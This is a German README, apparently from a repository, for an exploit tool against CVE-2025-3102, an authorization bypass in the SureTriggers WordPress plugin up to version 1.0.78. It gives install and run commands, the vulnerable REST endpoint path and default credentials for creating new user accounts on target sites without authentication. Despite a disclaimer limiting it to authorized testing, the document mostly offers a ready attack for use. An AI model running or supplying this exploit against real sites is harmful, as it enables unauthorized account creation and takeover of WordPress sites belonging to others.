
SureTriggers <= 1.0.78 - Autorisierungsumgehung Exploit
Dieses Tool nutzt eine Schwachstelle in der Berechtigungsprüfung im SureTriggers WordPress-Plugin (Versionen <= 1.0.78) aus, die es nicht authentifizierten Angreifern ermöglicht, neue WordPress-Benutzerkonten zu erstellen.
🔥 Entwickelt von 0xgh057r3c0n
requests, coloramaAbhängigkeiten installieren:
pip3 install -r requirements.txt
Oder manuell:
pip3 install requests colorama
python3 CVE-2025-3102.py -u <target_url> [--newmail <email>] [--newuser <username>] [--newpassword <password>]
python3 CVE-2025-3102.py -u https://target-site.com --newuser hacker --newpassword Pass123!
readme.txt.wp-json/sure-triggers/v1/automation/action.Dieses Tool dient ausschließlich zu Schulungs- und autorisierten Penetrationstestzwecken. Unbefugter Zugriff auf Systeme ist illegal und strafbar. Der Autor übernimmt keine Verantwortung für Missbrauch oder verursachte Schäden.
| Argument | Beschreibung | Standardwert |
|---|
-u, --url | Basis-URL der WordPress-Seite | Erforderlich |
--newmail | E-Mail-Adresse für den neuen Benutzer | [email protected] |
--newuser | Zu erstellender Benutzername | 0xgh057r3c0n |
--newpassword | Passwort für den neuen Benutzer | Wiz007@8876@ |